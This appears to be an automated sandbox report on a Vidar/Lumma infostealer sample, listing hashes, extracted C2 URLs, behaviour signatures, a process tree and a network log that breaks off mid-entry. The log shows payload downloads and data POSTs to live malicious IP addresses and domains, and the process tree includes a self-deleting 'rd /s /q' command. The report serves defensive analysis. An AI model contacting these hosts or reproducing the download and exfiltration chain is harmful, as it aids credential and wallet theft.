Analysis

  • max time kernel
    149s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240910-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20240910-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    19/09/2024, 23:33 UTC

General

  • Target

    file.exe

  • Size

    292KB

  • MD5

    4a8a0ccfecc930091116324c79c1006e

  • SHA1

    d790befcbc31a4befafeaf08879e15f99633b2a1

  • SHA256

    146b7006b041d25b6846c797234f38387ec4b141c4a7e4f100d0e6d2eda29088

  • SHA512

    ffef04766c2a9f9d038ccf6156ac7f03a0e0809adaf245a1347e5ece6ad31f9b37f283d71d34c031350456f30036078d5a3e97fa563bf6af6a8fcf6edeeb25d2

  • SSDEEP

    6144:eOqbmw1o1lVPSPP0qoKQy7xfkx2mjou4sFlOpHS9oEO:dOX05KKcbsTiHS6EO

Malware Config

Extracted

Family

vidar

C2

https://t.me/edm0d

https://steamcommunity.com/profiles/76561199768374681

Attributes
  • user_agent

    Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 OPR/110.0.0.0

Extracted

Family

lumma

C2

https://questionmwq.shop/api

https://chickerkuso.shop/api

https://achievenmtynwjq.shop/api

https://puredoffustow.shop/api

https://opponnentduei.shop/api

https://metallygaricwo.shop/api

https://milldymarskwom.shop/api

https://quotamkdsdqo.shop/api

https://carrtychaintnyw.shop/api

Signatures

  • Detect Vidar Stealer 17 IoCs
  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious access to, or copying of, a web browser credential store.

  • Downloads MZ/PE file
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 2 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Suspicious use of SetThreadContext 3 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

    Attempt to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 12 IoCs
  • Suspicious use of WriteProcessMemory 41 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\file.exe
    "C:\Users\Admin\AppData\Local\Temp\file.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:3084
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      2⤵
      • Checks computer location settings
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      • Checks processor information in registry
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:312
      • C:\ProgramData\CGDGCFBAEG.exe
        "C:\ProgramData\CGDGCFBAEG.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2212
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:3908
      • C:\ProgramData\IIEBAFCBKF.exe
        "C:\ProgramData\IIEBAFCBKF.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:4480
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
          4⤵
          • System Location Discovery: System Language Discovery
          • Checks processor information in registry
          • Suspicious behavior: EnumeratesProcesses
          PID:2892
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\DBFHDBGIEBFI" & exit
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:5008
        • C:\Windows\SysWOW64\timeout.exe
          timeout /t 10
          4⤵
          • System Location Discovery: System Language Discovery
          • Delays execution with timeout.exe
          PID:4136

Network

  • flag-us
    DNS
    58.55.71.13.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    58.55.71.13.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    172.214.232.199.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    172.214.232.199.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    67.31.126.40.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    67.31.126.40.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    95.221.229.192.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    95.221.229.192.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    t.me
    RegAsm.exe
    Remote address:
    8.8.8.8:53
    Request
    t.me
    IN A
    Response
    t.me
    IN A
    149.154.167.99
  • flag-nl
    GET
    https://t.me/edm0d
    RegAsm.exe
    Remote address:
    149.154.167.99:443
    Request
    GET /edm0d HTTP/1.1
    Host: t.me
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.18.0
    Date: Thu, 19 Sep 2024 23:33:10 GMT
    Content-Type: text/html; charset=utf-8
    Content-Length: 12287
    Connection: keep-alive
    Set-Cookie: stel_ssid=d92373b31a9965fef1_17716598562039938540; expires=Fri, 20 Sep 2024 23:33:10 GMT; path=/; samesite=None; secure; HttpOnly
    Pragma: no-cache
    Cache-control: no-store
    X-Frame-Options: ALLOW-FROM https://web.telegram.org
    Content-Security-Policy: frame-ancestors https://web.telegram.org
    Strict-Transport-Security: max-age=35768000
  • flag-de
    GET
    https://116.202.0.195/
    RegAsm.exe
    Remote address:
    116.202.0.195:443
    Request
    GET / HTTP/1.1
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 OPR/110.0.0.0
    Host: 116.202.0.195
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Date: Thu, 19 Sep 2024 23:33:10 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
  • flag-us
    DNS
    55.36.223.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    55.36.223.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    99.167.154.149.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    99.167.154.149.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    41.249.124.192.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    41.249.124.192.in-addr.arpa
    IN PTR
    Response
    41.249.124.192.in-addr.arpa
    IN PTR
    cloudproxy10041.sucuri.net
  • flag-de
    POST
    https://116.202.0.195/
    RegAsm.exe
    Remote address:
    116.202.0.195:443
    Request
    POST / HTTP/1.1
    Content-Type: multipart/form-data; boundary=----BFBAAFHDHCBGCAKFHDAK
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 OPR/110.0.0.0
    Host: 116.202.0.195
    Content-Length: 256
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Date: Thu, 19 Sep 2024 23:33:11 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
  • flag-us
    DNS
    195.0.202.116.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    195.0.202.116.in-addr.arpa
    IN PTR
    Response
    195.0.202.116.in-addr.arpa
    IN PTR
    static.195.0.202.116.clients.your-server.de
  • flag-de
    POST
    https://116.202.0.195/
    RegAsm.exe
    Remote address:
    116.202.0.195:443
    Request
    POST / HTTP/1.1
    Content-Type: multipart/form-data; boundary=----BGIJEGCGDGHDHIDHDGCB
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 OPR/110.0.0.0
    Host: 116.202.0.195
    Content-Length: 331
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Date: Thu, 19 Sep 2024 23:33:11 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
  • flag-de
    POST
    https://116.202.0.195/
    RegAsm.exe
    Remote address:
    116.202.0.195:443
    Request
    POST / HTTP/1.1
    Content-Type: multipart/form-data; boundary=----BGDAAKJJDAAKFHJKJKFC
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 OPR/110.0.0.0
    Host: 116.202.0.195
    Content-Length: 331
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Date: Thu, 19 Sep 2024 23:33:13 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
  • flag-de
    POST
    https://116.202.0.195/
    RegAsm.exe
    Remote address:
    116.202.0.195:443
    Request
    POST / HTTP/1.1
    Content-Type: multipart/form-data; boundary=----EGIDAFBAEBKKEBFIJEBK
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 OPR/110.0.0.0
    Host: 116.202.0.195
    Content-Length: 332
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Date: Thu, 19 Sep 2024 23:33:13 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
  • flag-de
    POST
    https://116.202.0.195/
    RegAsm.exe
    Remote address:
    116.202.0.195:443
    Request
    POST / HTTP/1.1
    Content-Type: multipart/form-data; boundary=----DHCBAEHJJJKKFIDGHJEC
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 OPR/110.0.0.0
    Host: 116.202.0.195
    Content-Length: 4701
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Date: Thu, 19 Sep 2024 23:33:14 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
  • flag-de
    GET
    https://116.202.0.195/sqlp.dll
    RegAsm.exe
    Remote address:
    116.202.0.195:443
    Request
    GET /sqlp.dll HTTP/1.1
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 OPR/110.0.0.0
    Host: 116.202.0.195
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Date: Thu, 19 Sep 2024 23:33:14 GMT
    Content-Type: application/octet-stream
    Content-Length: 2459136
    Connection: keep-alive
    Last-Modified: Thursday, 19-Sep-2024 23:33:14 GMT
    Cache-Control: no-store, no-cache
    Accept-Ranges: bytes
  • flag-de
    POST
    https://116.202.0.195/
    RegAsm.exe
    Remote address:
    116.202.0.195:443
    Request
    POST / HTTP/1.1
    Content-Type: multipart/form-data; boundary=----AEGIJKEHCAKFCAKFHDAA
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 OPR/110.0.0.0
    Host: 116.202.0.195
    Content-Length: 437
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Date: Thu, 19 Sep 2024 23:33:16 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
  • flag-de
    POST
    https://116.202.0.195/
    RegAsm.exe
    Remote address:
    116.202.0.195:443
    Request
    POST / HTTP/1.1
    Content-Type: multipart/form-data; boundary=----BGCAAFHIEBKJKEBFIEHD
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 OPR/110.0.0.0
    Host: 116.202.0.195
    Content-Length: 437
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Date: Thu, 19 Sep 2024 23:33:16 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
  • flag-de
    GET
    https://116.202.0.195/freebl3.dll
    RegAsm.exe
    Remote address:
    116.202.0.195:443
    Request
    GET /freebl3.dll HTTP/1.1
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 OPR/110.0.0.0
    Host: 116.202.0.195
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Date: Thu, 19 Sep 2024 23:33:17 GMT
    Content-Type: application/octet-stream
    Content-Length: 685392
    Connection: keep-alive
    Last-Modified: Thursday, 19-Sep-2024 23:33:17 GMT
    Cache-Control: no-store, no-cache
    Accept-Ranges: bytes
  • flag-de
    GET
    https://116.202.0.195/mozglue.dll
    RegAsm.exe
    Remote address:
    116.202.0.195:443
    Request
    GET /mozglue.dll HTTP/1.1
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 OPR/110.0.0.0
    Host: 116.202.0.195
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Date: Thu, 19 Sep 2024 23:33:17 GMT
    Content-Type: application/octet-stream
    Content-Length: 608080
    Connection: keep-alive
    Last-Modified: Thursday, 19-Sep-2024 23:33:17 GMT
    Cache-Control: no-store, no-cache
    Accept-Ranges: bytes
  • flag-de
    GET
    https://116.202.0.195/msvcp140.dll
    RegAsm.exe
    Remote address:
    116.202.0.195:443
    Request
    GET /msvcp140.dll HTTP/1.1
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 OPR/110.0.0.0
    Host: 116.202.0.195
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Date: Thu, 19 Sep 2024 23:33:18 GMT
    Content-Type: application/octet-stream
    Content-Length: 450024
    Connection: keep-alive
    Last-Modified: Thursday, 19-Sep-2024 23:33:18 GMT
    Cache-Control: no-store, no-cache
    Accept-Ranges: bytes
  • flag-de
    GET
    https://116.202.0.195/softokn3.dll
    RegAsm.exe
    Remote address:
    116.202.0.195:443
    Request
    GET /softokn3.dll HTTP/1.1
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 OPR/110.0.0.0
    Host: 116.202.0.195
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Date: Thu, 19 Sep 2024 23:33:18 GMT
    Content-Type: application/octet-stream
    Content-Length: 257872
    Connection: keep-alive
    Last-Modified: Thursday, 19-Sep-2024 23:33:18 GMT
    Cache-Control: no-store, no-cache
    Accept-Ranges: bytes
  • flag-de
    GET
    https://116.202.0.195/vcruntime140.dll
    RegAsm.exe
    Remote address:
    116.202.0.195:443
    Request
    GET /vcruntime140.dll HTTP/1.1
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 OPR/110.0.0.0
    Host: 116.202.0.195
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Date: Thu, 19 Sep 2024 23:33:18 GMT
    Content-Type: application/octet-stream
    Content-Length: 80880
    Connection: keep-alive
    Last-Modified: Thursday, 19-Sep-2024 23:33:18 GMT
    Cache-Control: no-store, no-cache
    Accept-Ranges: bytes
  • flag-de
    GET
    https://116.202.0.195/nss3.dll
    RegAsm.exe
    Remote address:
    116.202.0.195:443
    Request
    GET /nss3.dll HTTP/1.1
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 OPR/110.0.0.0
    Host: 116.202.0.195
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Date: Thu, 19 Sep 2024 23:33:19 GMT
    Content-Type: application/octet-stream
    Content-Length: 2046288
    Connection: keep-alive
    Last-Modified: Thursday, 19-Sep-2024 23:33:19 GMT
    Cache-Control: no-store, no-cache
    Accept-Ranges: bytes
  • flag-de
    POST
    https://116.202.0.195/
    RegAsm.exe
    Remote address:
    116.202.0.195:443
    Request
    POST / HTTP/1.1
    Content-Type: multipart/form-data; boundary=----IIIDAKJDHJKFHIEBFCGH
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 OPR/110.0.0.0
    Host: 116.202.0.195
    Content-Length: 1025
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Date: Thu, 19 Sep 2024 23:33:20 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
  • flag-de
    POST
    https://116.202.0.195/
    RegAsm.exe
    Remote address:
    116.202.0.195:443
    Request
    POST / HTTP/1.1
    Content-Type: multipart/form-data; boundary=----JDHIEBFHCAKEHIDGHCBA
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 OPR/110.0.0.0
    Host: 116.202.0.195
    Content-Length: 331
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Date: Thu, 19 Sep 2024 23:33:20 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
  • flag-de
    POST
    https://116.202.0.195/
    RegAsm.exe
    Remote address:
    116.202.0.195:443
    Request
    POST / HTTP/1.1
    Content-Type: multipart/form-data; boundary=----JEHDHIEGIIIDHIDHDHJJ
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 OPR/110.0.0.0
    Host: 116.202.0.195
    Content-Length: 331
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Date: Thu, 19 Sep 2024 23:33:21 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
  • flag-de
    POST
    https://116.202.0.195/
    RegAsm.exe
    Remote address:
    116.202.0.195:443
    Request
    POST / HTTP/1.1
    Content-Type: multipart/form-data; boundary=----GHCGDAFCFHIDBGDHCFCB
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 OPR/110.0.0.0
    Host: 116.202.0.195
    Content-Length: 461
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Date: Thu, 19 Sep 2024 23:33:22 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
  • flag-de
    POST
    https://116.202.0.195/
    RegAsm.exe
    Remote address:
    116.202.0.195:443
    Request
    POST / HTTP/1.1
    Content-Type: multipart/form-data; boundary=----ECBGCBGCAFIIECBFIDHI
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 OPR/110.0.0.0
    Host: 116.202.0.195
    Content-Length: 120797
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Date: Thu, 19 Sep 2024 23:33:23 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
  • flag-us
    DNS
    28.118.140.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    28.118.140.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    133.211.185.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    133.211.185.52.in-addr.arpa
    IN PTR
    Response
  • flag-de
    POST
    https://116.202.0.195/
    RegAsm.exe
    Remote address:
    116.202.0.195:443
    Request
    POST / HTTP/1.1
    Content-Type: multipart/form-data; boundary=----AEHIECAFCGDBFHIDBKFC
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 OPR/110.0.0.0
    Host: 116.202.0.195
    Content-Length: 331
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Date: Thu, 19 Sep 2024 23:33:23 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
  • flag-ch
    GET
    http://147.45.44.104/prog/66ecb454d2b4a_lgfdsjgds.exe
    RegAsm.exe
    Remote address:
    147.45.44.104:80
    Request
    GET /prog/66ecb454d2b4a_lgfdsjgds.exe HTTP/1.1
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 OPR/110.0.0.0
    Host: 147.45.44.104
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Date: Thu, 19 Sep 2024 23:33:23 GMT
    Content-Type: application/octet-stream
    Content-Length: 363424
    Last-Modified: Thu, 19 Sep 2024 23:31:32 GMT
    Connection: keep-alive
    Keep-Alive: timeout=120
    ETag: "66ecb454-58ba0"
    X-Content-Type-Options: nosniff
    Accept-Ranges: bytes
  • flag-ch
    GET
    http://147.45.44.104/prog/66ecb44c35444_vfdhsgdf.exe
    RegAsm.exe
    Remote address:
    147.45.44.104:80
    Request
    GET /prog/66ecb44c35444_vfdhsgdf.exe HTTP/1.1
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 OPR/110.0.0.0
    Host: 147.45.44.104
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Date: Thu, 19 Sep 2024 23:33:25 GMT
    Content-Type: application/octet-stream
    Content-Length: 299936
    Last-Modified: Thu, 19 Sep 2024 23:31:24 GMT
    Connection: keep-alive
    Keep-Alive: timeout=120
    ETag: "66ecb44c-493a0"
    X-Content-Type-Options: nosniff
    Accept-Ranges: bytes
  • flag-de
    POST
    https://116.202.0.195/
    RegAsm.exe
    Remote address:
    116.202.0.195:443
    Request
    POST / HTTP/1.1
    Content-Type: multipart/form-data; boundary=----DHCAAEBKEGHJKEBFHJDB
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 OPR/110.0.0.0
    Host: 116.202.0.195
    Content-Length: 499
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Date: Thu, 19 Sep 2024 23:33:25 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
  • flag-us
    DNS
    104.44.45.147.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    104.44.45.147.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    questionmwq.shop
    RegAsm.exe
    Remote address:
    8.8.8.8:53
    Request
    questionmwq.shop
    IN A
    Response
    questionmwq.shop
    IN A
    172.67.204.62
    questionmwq.shop
    IN A
    104.21.85.92
  • flag-us
    POST
    https://questionmwq.shop/api
    RegAsm.exe
    Remote address:
    172.67.204.62:443
    Request
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 8
    Host: questionmwq.shop
    Response
    HTTP/1.1 200 OK
    Date: Thu, 19 Sep 2024 23:33:26 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Set-Cookie: PHPSESSID=m7f79rc5hi5fga1fia7g3cjqj0; expires=Mon, 13 Jan 2025 17:20:05 GMT; Max-Age=9999999; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=k0rMAkm%2BfFNILF1KEbspyRU2fZurmLwvv77bl9%2FuvVo3erFfQlEXsPv2W3mLPleBwiR0UDfr%2F2f51xqUxI9atjWgkSIbPULzIZqOVIuvCDNHMeHNMMQcJYnJo7C8hJ16GLAg"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8c5d6177ea1763d5-LHR
    alt-svc: h3=":443"; ma=86400
  • flag-us
    DNS
    62.204.67.172.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    62.204.67.172.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    chickerkuso.shop
    RegAsm.exe
    Remote address:
    8.8.8.8:53
    Request
    chickerkuso.shop
    IN A
    Response
    chickerkuso.shop
    IN A
    172.67.173.81
    chickerkuso.shop
    IN A
    104.21.88.61
  • flag-us
    POST
    https://chickerkuso.shop/api
    RegAsm.exe
    Remote address:
    172.67.173.81:443
    Request
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 8
    Host: chickerkuso.shop
    Response
    HTTP/1.1 200 OK
    Date: Thu, 19 Sep 2024 23:33:27 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Set-Cookie: PHPSESSID=eq97067ifjpvesoo4srduhko8p; expires=Mon, 13 Jan 2025 17:20:06 GMT; Max-Age=9999999; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5Lcvqlqyvaovme2dYTbeSKXkDwovlQisJMafdTIAgH6p7aKyv%2FivdvsF0SQgYrUkKi43g04L4DnAkvY4V14txdEYxBsdMy1xQyVof3BRVANhgGuvaJZh0L%2Fs8FAV8MtqW5kM"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8c5d617bba4071fb-LHR
  • flag-us
    DNS
    achievenmtynwjq.shop
    RegAsm.exe
    Remote address:
    8.8.8.8:53
    Request
    achievenmtynwjq.shop
    IN A
    Response
    achievenmtynwjq.shop
    IN A
    104.21.39.77
    achievenmtynwjq.shop
    IN A
    172.67.143.200
  • flag-us
    POST
    https://achievenmtynwjq.shop/api
    RegAsm.exe
    Remote address:
    104.21.39.77:443
    Request
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 8
    Host: achievenmtynwjq.shop
    Response
    HTTP/1.1 200 OK
    Date: Thu, 19 Sep 2024 23:33:27 GMT
